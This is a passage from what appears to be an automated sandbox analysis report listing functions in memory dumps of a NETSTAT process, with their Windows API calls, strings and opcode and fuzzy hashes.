                                                                                                                                                                                  • _fileno.MSVCRT ref: 006447B1
                                                                                                                                                                                  • _setmode.MSVCRT ref: 006447B9
                                                                                                                                                                                  • WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0(?,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,0064203C), ref: 006447D7
                                                                                                                                                                                  • LocalAlloc.API-MS-WIN-CORE-HEAP-L2-1-0(00000040,00000000,?,?,?,?,?,?,?,0064203C,00000000,?,00000000,000000FF), ref: 006447E7
                                                                                                                                                                                  • WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0(?,00000000,?,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,?,0064203C), ref: 00644805
                                                                                                                                                                                  • _fileno.MSVCRT ref: 00644812
                                                                                                                                                                                  • _write.MSVCRT ref: 0064481A
                                                                                                                                                                                  • fwprintf.MSVCRT ref: 0064482B
                                                                                                                                                                                  • fflush.MSVCRT ref: 00644835
                                                                                                                                                                                  • _fileno.MSVCRT ref: 0064483E
                                                                                                                                                                                  • _setmode.MSVCRT ref: 00644846
                                                                                                                                                                                  • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(00000000), ref: 00644853
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.4141063988.0000000000640000.00000040.80000000.00040000.00000000.sdmp, Offset: 00640000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_640000_NETSTAT.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: _fileno$_setmode$ByteCharLocalMultiWidefflush$AllocFree_get_osfhandle_writefwprintfwcschr
                                                                                                                                                                                  • String ID: %ls$< d
                                                                                                                                                                                  • API String ID: 2233937912-483866885
                                                                                                                                                                                  • Opcode ID: b48db332b737153219b38ed406433f23ddd0973c95f689ff3d35e743680c104d
                                                                                                                                                                                  • Instruction ID: a259c589f9108668db03f0333064f770da94eb8a2af9e16d0d3378da24e8733e
                                                                                                                                                                                  • Opcode Fuzzy Hash: b48db332b737153219b38ed406433f23ddd0973c95f689ff3d35e743680c104d
                                                                                                                                                                                  • Instruction Fuzzy Hash: 76319076900205FFEB015BA0EC4EFEF7B7AEB46721F20442AF511E3290EF7499029A54
                                                                                                                                                                                  Function 00644945 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 101libraryloaderCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • time.MSVCRT(00000000,00000000,000000FF), ref: 0064495F
                                                                                                                                                                                  • GetSystemDirectoryA.API-MS-WIN-CORE-SYSINFO-L1-1-0(?), ref: 00644975
                                                                                                                                                                                  • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 0064497F
                                                                                                                                                                                  • LoadLibraryExA.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,00000000,00000000,?,00000000), ref: 006449C7
                                                                                                                                                                                  • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000,SnmpMgrOidToStr), ref: 006449D7
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.4141063988.0000000000640000.00000040.80000000.00040000.00000000.sdmp, Offset: 00640000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_640000_NETSTAT.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: AddressDirectoryErrorLastLibraryLoadProcSystemtime
                                                                                                                                                                                  • String ID: SnmpExtensionInit$SnmpExtensionQuery$SnmpMgrOidToStr
                                                                                                                                                                                  • API String ID: 698272139-2433094189
                                                                                                                                                                                  • Opcode ID: 9086e8bc0a553baf58bbb9bf4493a2b2d7a2f8c99b3451668be16e988714d1c0
                                                                                                                                                                                  • Instruction ID: 57b546bea7fb4cfbe9227718e4fb107875da17a93970d0fff391bf9528d59426
                                                                                                                                                                                  • Opcode Fuzzy Hash: 9086e8bc0a553baf58bbb9bf4493a2b2d7a2f8c99b3451668be16e988714d1c0
                                                                                                                                                                                  • Instruction Fuzzy Hash: C331A679600219AFCB15DFB4DD4ABEE77AFAB06700B005196E901E7250DF70DE45CB90
                                                                                                                                                                                  Function 03112890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.4143880964.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000007.00000002.4143880964.00000000031C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.4143880964.00000000031CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.4143880964.000000000323E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_30a0000_NETSTAT.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ___swprintf_l
                                                                                                                                                                                  • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                                                                  • API String ID: 48624451-2108815105
                                                                                                                                                                                  • Opcode ID: bb291f024f4a672aa177a462bf2f071d1896d1dde72e4bb8125e46b052edc385
                                                                                                                                                                                  • Instruction ID: 3eab470fa2002024d63b6ce2f26909697e1ba15a52cdd7fbd0edf7d1c223cce4
                                                                                                                                                                                  • Opcode Fuzzy Hash: bb291f024f4a672aa177a462bf2f071d1896d1dde72e4bb8125e46b052edc385
                                                                                                                                                                                  • Instruction Fuzzy Hash: E551E9B5A0016ABFCB14DB9C89909BEFBF8BF0C2007158679E4A5DB641D374DE6187A0
                                                                                                                                                                                  Function 03182410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.4143880964.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000007.00000002.4143880964.00000000031C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.4143880964.00000000031CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.4143880964.000000000323E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_30a0000_NETSTAT.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ___swprintf_l
                                                                                                                                                                                  • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                                                                  • API String ID: 48624451-2108815105
                                                                                                                                                                                  • Opcode ID: 1077928971387440b81773d3a55cb600809f02a000e92f2b23ae50c0a7fcf58f
                                                                                                                                                                                  • Instruction ID: a7415c5fe3b990d1350a4c678f3608c1257f167e80385a434f1bf522c935034e
                                                                                                                                                                                  • Opcode Fuzzy Hash: 1077928971387440b81773d3a55cb600809f02a000e92f2b23ae50c0a7fcf58f
                                                                                                                                                                                  • Instruction Fuzzy Hash: 0D5106B9A40645AFCB31EF9CC8908BFF7F9EF4C200B448899E496D7641D7B4DA418B64
                                                                                                                                                                                  Function 006445AB Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 63COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • GetEnvironmentVariableW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(OutputEncoding,?,00000050,00000000), ref: 006445D1
                                                                                                                                                                                  • _wcsicmp.MSVCRT ref: 006445F2
                                                                                                                                                                                  • _wcsicmp.MSVCRT ref: 0064460D
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.4141063988.0000000000640000.00000040.80000000.00040000.00000000.sdmp, Offset: 00640000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_640000_NETSTAT.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: _wcsicmp$EnvironmentVariable
                                                                                                                                                                                  • String ID: Ansi$OutputEncoding$UTF-8$UTF8$Unicode
                                                                                                                                                                                  • API String ID: 198002717-1479523454
                                                                                                                                                                                  • Opcode ID: 9ffeb62cddcb5f7d919410b4d5ad1dc92ac9899080583e5e6239dae09c232551
                                                                                                                                                                                  • Instruction ID: f2596c2fb60f6c25d3798a158102706aeea479a1f7085666243a96e80aecfe10
                                                                                                                                                                                  • Opcode Fuzzy Hash: 9ffeb62cddcb5f7d919410b4d5ad1dc92ac9899080583e5e6239dae09c232551
                                                                                                                                                                                  • Instruction Fuzzy Hash: AB11E039600306AFDB249B24EC0ABEE77EADF47725F51045AE041D7180EFB0EAC0CA15
                                                                                                                                                                                  Function 006435EE Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 169COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • GetHostNameW.WS2_32(00647CD8,00000104), ref: 0064365F
                                                                                                                                                                                  • wcschr.MSVCRT ref: 00643676
                                                                                                                                                                                  • GetNameInfoW.WS2_32(?,?,?,00000104,00000000,00000000,?), ref: 006436A2
                                                                                                                                                                                  • GetNameInfoW.WS2_32(?,?,?,00000104,00000000,00000000,?), ref: 006436C9
                                                                                                                                                                                  • GetNameInfoW.WS2_32(?,?,00000000,00000000,?,000000C8,?), ref: 006436F5
                                                                                                                                                                                  • GetNameInfoW.WS2_32(?,?,00000000,00000000,?,000000C8,?), ref: 00643726
                                                                                                                                                                                  • wcschr.MSVCRT ref: 00643783
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.4141063988.0000000000640000.00000040.80000000.00040000.00000000.sdmp, Offset: 00640000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_640000_NETSTAT.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Name$Info$wcschr$Host
                                                                                                                                                                                  • String ID: %s:%s$[%s]:%s
                                                                                                                                                                                  • API String ID: 3401028553-3707195743
                                                                                                                                                                                  • Opcode ID: 508a34d21d5e8549f33e280b0a991562cc53eadfe90cc807f65b9e0fce414d0f
                                                                                                                                                                                  • Instruction ID: 45bbc4b8550fe76245c71651a4e51e40e1a78783dc34feee436979f38a345848
                                                                                                                                                                                  • Opcode Fuzzy Hash: 508a34d21d5e8549f33e280b0a991562cc53eadfe90cc807f65b9e0fce414d0f
                                                                                                                                                                                  • Instruction Fuzzy Hash: 7651CFB5A0022AAFDF249F14CC40AEA777AEF46741F0140A9FA89A7350D7709F85CF95
                                                                                                                                                                                  Function 0064289D Relevance: 15.4, APIs: 10, Instructions: 365memoryCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 00641C89: GetCurrentProcess.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(00000028,?,0000274F,?,?,?,?,?,?,0064222F), ref: 00641CA2
                                                                                                                                                                                    • Part of subcall function 00641C89: OpenProcessToken.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(00000000,?,?,?,?,?,?,0064222F), ref: 00641CA9
                                                                                                                                                                                    • Part of subcall function 00641C89: AdjustTokenPrivileges.API-MS-WIN-SECURITY-BASE-L1-1-0(?,00000000,00000001,00000010,00000000,00000000), ref: 00641CD9
                                                                                                                                                                                    • Part of subcall function 00641C89: CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?), ref: 00641CE7
                                                                                                                                                                                    • Part of subcall function 006448A5: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00001900,00000000,00000000,00000000,?,00000000,00000000,?,?,?,006443B7,0000275D,00000000,00000000,?), ref: 006448CA
                                                                                                                                                                                  • NsiAllocateAndGetTable.NSI(00000001,00641100,00000002,?,0000003C,00000000,00000000,00000000,00000000,?,00000008,?,00000000,?,00000000,000000FF), ref: 006429C3
                                                                                                                                                                                  • NsiAllocateAndGetTable.NSI(00000001,00641100,00000003,?,00000020,00000000,00000000,00000000,00000000,?,00000008,?,00000000), ref: 00642A02
                                                                                                                                                                                    • Part of subcall function 006435EE: GetHostNameW.WS2_32(00647CD8,00000104), ref: 0064365F
                                                                                                                                                                                    • Part of subcall function 006435EE: wcschr.MSVCRT ref: 00643676
                                                                                                                                                                                    • Part of subcall function 006435EE: GetNameInfoW.WS2_32(?,?,00000000,00000000,?,000000C8,?), ref: 006436F5
                                                                                                                                                                                    • Part of subcall function 006435EE: GetNameInfoW.WS2_32(?,?,00000000,00000000,?,000000C8,?), ref: 00643726
                                                                                                                                                                                    • Part of subcall function 006435EE: GetNameInfoW.WS2_32(?,?,?,00000104,00000000,00000000,?), ref: 006436A2
                                                                                                                                                                                    • Part of subcall function 006435EE: GetNameInfoW.WS2_32(?,?,?,00000104,00000000,00000000,?), ref: 006436C9
                                                                                                                                                                                    • Part of subcall function 006435EE: wcschr.MSVCRT ref: 00643783
                                                                                                                                                                                  • NsiFreeTable.NSI(?,00000000,00000000,?), ref: 00642C07
                                                                                                                                                                                  • NsiFreeTable.NSI(?,00000000,00000000,?), ref: 00642C1B
                                                                                                                                                                                  • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?), ref: 00642C2C
                                                                                                                                                                                  • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(00000000), ref: 00642C37
                                                                                                                                                                                  • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(00000000), ref: 00642C48
                                                                                                                                                                                  • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(00000000), ref: 00642C59
                                                                                                                                                                                  • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?), ref: 00642C6A
                                                                                                                                                                                  • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?), ref: 00642C7B
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.4141063988.0000000000640000.00000040.80000000.00040000.00000000.sdmp, Offset: 00640000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_640000_NETSTAT.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Free$Local$Name$InfoTable$AllocateProcessTokenwcschr$AdjustCloseCurrentFormatHandleHostMessageOpenPrivileges
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3162703053-0
                                                                                                                                                                                  • Opcode ID: 96374b96533146962305561b57248031caad44b31a1de46400eab80f9c8b7c5d
                                                                                                                                                                                  • Instruction ID: 14bca6a6bd98b55efa711732e77f8a526dacc8488eacca6178796af126447a41
                                                                                                                                                                                  • Opcode Fuzzy Hash: 96374b96533146962305561b57248031caad44b31a1de46400eab80f9c8b7c5d
                                                                                                                                                                                  • Instruction Fuzzy Hash: F0E15071D08329AFEB619F50CC85BE9B3BAEB04744F1440D9F50DA6280DA78AEC4CF51
                                                                                                                                                                                  Function 00641D6B Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 196memoryCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • NsiAllocateAndGetTable.NSI(00000001,00641118,00000003,00000017,00000038,00000000,00000000,00000000,00000010,?,00000020,006424B9,00000000,00000000,0000274F,00000000), ref: 00641DB3
                                                                                                                                                                                  • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000008,006424AD,?,?,?,?,?,?,?,?,?,?,?,006424B9,00000000), ref: 00641DDA
                                                                                                                                                                                  • NsiFreeTable.NSI(00000017,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,006424B9), ref: 00641DF0
                                                                                                                                                                                  • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000008,006424AD,?,?,?,?,?,?,?,?,?,?,?,006424B9,00000000), ref: 00641E0B
                                                                                                                                                                                  • memset.MSVCRT ref: 00641EBB
                                                                                                                                                                                  • NsiFreeTable.NSI(00000017,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,006424B9), ref: 00641F71
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.4141063988.0000000000640000.00000040.80000000.00040000.00000000.sdmp, Offset: 00640000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_640000_NETSTAT.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Table$AllocFreeHeap$Allocatememset
                                                                                                                                                                                  • String ID: 8$p^v
                                                                                                                                                                                  • API String ID: 1604459968-753539834
                                                                                                                                                                                  • Opcode ID: 7eac00e68b16a94577bf777e0732e97e733c21ec3d4de9fe4d54695174813423
                                                                                                                                                                                  • Instruction ID: 73f277a6fa5a3d89f57ec2ac0d84ab400b98f14d1126ff7af95fb82035d9db15
                                                                                                                                                                                  • Opcode Fuzzy Hash: 7eac00e68b16a94577bf777e0732e97e733c21ec3d4de9fe4d54695174813423
                                                                                                                                                                                  • Instruction Fuzzy Hash: 7281C6B5D00219EFDB54CF98C981AADBBB5FF09714F24809AE905AB341D371AE81DF90
                                                                                                                                                                                  Function 03107630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 03144742
                                                                                                                                                                                  • Execute=1, xrefs: 03144713
                                                                                                                                                                                  • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 03144725
                                                                                                                                                                                  • CLIENT(ntdll): Processing section info %ws..., xrefs: 03144787
                                                                                                                                                                                  • ExecuteOptions, xrefs: 031446A0
                                                                                                                                                                                  • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 031446FC
                                                                                                                                                                                  • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 03144655
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.4143880964.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000007.00000002.4143880964.00000000031C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.4143880964.00000000031CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.4143880964.000000000323E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_30a0000_NETSTAT.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                                                                                  • API String ID: 0-484625025
                                                                                                                                                                                  • Opcode ID: 76b1e8ba4d15ebc69eb9cd54cbb900e0fb9b2f7eb7fa832b6a892e4774ad1c52
                                                                                                                                                                                  • Instruction ID: 1301af3ea4c22078c5b4e0cfccc2bb786d364e09d5884793b46a529022170d36
                                                                                                                                                                                  • Opcode Fuzzy Hash: 76b1e8ba4d15ebc69eb9cd54cbb900e0fb9b2f7eb7fa832b6a892e4774ad1c52
                                                                                                                                                                                  • Instruction Fuzzy Hash: D8510975A00319ABEF15EBA5DC99BED77B8AF0C340F1400A9E505AB1C1DBB1AA85CF50
                                                                                                                                                                                  Function 00644662 Relevance: 13.6, APIs: 9, Instructions: 70COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 00644530: _fileno.MSVCRT ref: 0064453B
                                                                                                                                                                                    • Part of subcall function 00644530: _get_osfhandle.MSVCRT ref: 00644542
                                                                                                                                                                                    • Part of subcall function 006445AB: GetEnvironmentVariableW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(OutputEncoding,?,00000050,00000000), ref: 006445D1
                                                                                                                                                                                    • Part of subcall function 006445AB: _wcsicmp.MSVCRT ref: 006445F2
                                                                                                                                                                                  • fgetpos.MSVCRT ref: 00644697
                                                                                                                                                                                  • _fileno.MSVCRT ref: 006446B1
                                                                                                                                                                                  • _setmode.MSVCRT ref: 006446B9
                                                                                                                                                                                  • fwprintf.MSVCRT ref: 006446C5
                                                                                                                                                                                  • fgetpos.MSVCRT ref: 006446DE
                                                                                                                                                                                  • _fileno.MSVCRT ref: 006446F8
                                                                                                                                                                                  • _setmode.MSVCRT ref: 00644700
                                                                                                                                                                                  • _fileno.MSVCRT ref: 00644710
                                                                                                                                                                                  • _write.MSVCRT ref: 00644718
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.4141063988.0000000000640000.00000040.80000000.00040000.00000000.sdmp, Offset: 00640000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_640000_NETSTAT.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: _fileno$_setmodefgetpos$EnvironmentVariable_get_osfhandle_wcsicmp_writefwprintf
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2328354365-0
                                                                                                                                                                                  • Opcode ID: 06e45474269ab012abea6a3605c9b748eced1b668e288de67a32e1cdf6220119
                                                                                                                                                                                  • Instruction ID: d4ec80a297c33a731dc7236ec66b8775bbf26aaf7b8a8638616b664eb9e8f564
                                                                                                                                                                                  • Opcode Fuzzy Hash: 06e45474269ab012abea6a3605c9b748eced1b668e288de67a32e1cdf6220119
                                                                                                                                                                                  • Instruction Fuzzy Hash: F1110335900215EFDB14ABE4FC4FADE77AAFF073A3B201456E401E3690EF749A428655
                                                                                                                                                                                  Function 006459F3 Relevance: 10.6, APIs: 7, Instructions: 105sleepCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • Sleep.API-MS-WIN-CORE-SYNCH-L1-2-0(000003E8,00646160,0000000C), ref: 00645A30
                                                                                                                                                                                  • _amsg_exit.MSVCRT ref: 00645A45
                                                                                                                                                                                  • _initterm.MSVCRT ref: 00645A99
                                                                                                                                                                                  • __IsNonwritableInCurrentImage.LIBCMT ref: 00645AC5
                                                                                                                                                                                  • exit.MSVCRT ref: 00645B0C
                                                                                                                                                                                  • _XcptFilter.MSVCRT ref: 00645B1E
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.4141063988.0000000000640000.00000040.80000000.00040000.00000000.sdmp, Offset: 00640000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_640000_NETSTAT.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: CurrentFilterImageNonwritableSleepXcpt_amsg_exit_inittermexit
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 796493780-0
                                                                                                                                                                                  • Opcode ID: adc0251a82c45d051d70069746527bec6a34c62a8ad737c1049832660ed33e01
                                                                                                                                                                                  • Instruction ID: f93a5b8cb0f352e4bdd0681591f16c4ed1116c1959968a1032baa221b0be8945
                                                                                                                                                                                  • Opcode Fuzzy Hash: adc0251a82c45d051d70069746527bec6a34c62a8ad737c1049832660ed33e01
                                                                                                                                                                                  • Instruction Fuzzy Hash: EC312439608B15DFDB25EF64EC45A2977A3EB06720F10162DE503973A2DB704C81CF80
                                                                                                                                                                                  Function 00644530 Relevance: 10.6, APIs: 7, Instructions: 53COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • _fileno.MSVCRT ref: 0064453B
                                                                                                                                                                                  • _get_osfhandle.MSVCRT ref: 00644542
                                                                                                                                                                                  • GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,00000000), ref: 00644558
                                                                                                                                                                                  • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00644564
                                                                                                                                                                                  • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 0064456E
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.4141063988.0000000000640000.00000040.80000000.00040000.00000000.sdmp, Offset: 00640000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_640000_NETSTAT.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ErrorLast$FileType_fileno_get_osfhandle
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3475475711-0
                                                                                                                                                                                  • Opcode ID: 00fbb8d4d17c6bb626d08d3df3e4858e6be5bec63834f988d388ba47dfc75e85
                                                                                                                                                                                  • Instruction ID: 95012a2246a9e4e4ffc7e806b22ae9b4fe0c79d7dad0c85a93a046bfdbbf3238
                                                                                                                                                                                  • Opcode Fuzzy Hash: 00fbb8d4d17c6bb626d08d3df3e4858e6be5bec63834f988d388ba47dfc75e85
                                                                                                                                                                                  • Instruction Fuzzy Hash: 7E01D677A24100AF9B28ABB5AC4EABF379BDA86B717105525F512E3290EF30CC018170
                                                                                                                                                                                  Function 0311B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.4143880964.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000007.00000002.4143880964.00000000031C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.4143880964.00000000031CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.4143880964.000000000323E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_30a0000_NETSTAT.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: __aulldvrm
                                                                                                                                                                                  • String ID: +$-$0$0
                                                                                                                                                                                  • API String ID: 1302938615-699404926
                                                                                                                                                                                  • Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                                                                                                                  • Instruction ID: 03df6fe3dd6789cc965954fdf4fea96af481ac19c549a56a8ab5b90411ace55f
                                                                                                                                                                                  • Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                                                                                                                  • Instruction Fuzzy Hash: F681AF71E192499FDF28CE68C8517EEBBA5AF5D710F1CC169D851A73D0C77488A0CB60
                                                                                                                                                                                  Function 031820E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.4143880964.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000007.00000002.4143880964.00000000031C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.4143880964.00000000031CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000007.00000002.4143880964.000000000323E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_30a0000_NETSTAT.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ___swprintf_l
                                                                                                                                                                                  • String ID: %%%u$[$]:%u
                                                                                                                                                                                  • API String ID: 48624451-2819853543
                                                                                                                                                                                  • Opcode ID: 6f8b1749a16742cce6a2c4743433c6401147adbf2d688799e6a875af9c099537
                                                                                                                                                                                  • Instruction ID: f3e7052cb3fedd6617217b549caabdbd1a40965829c86ef82b480811fb6a371e
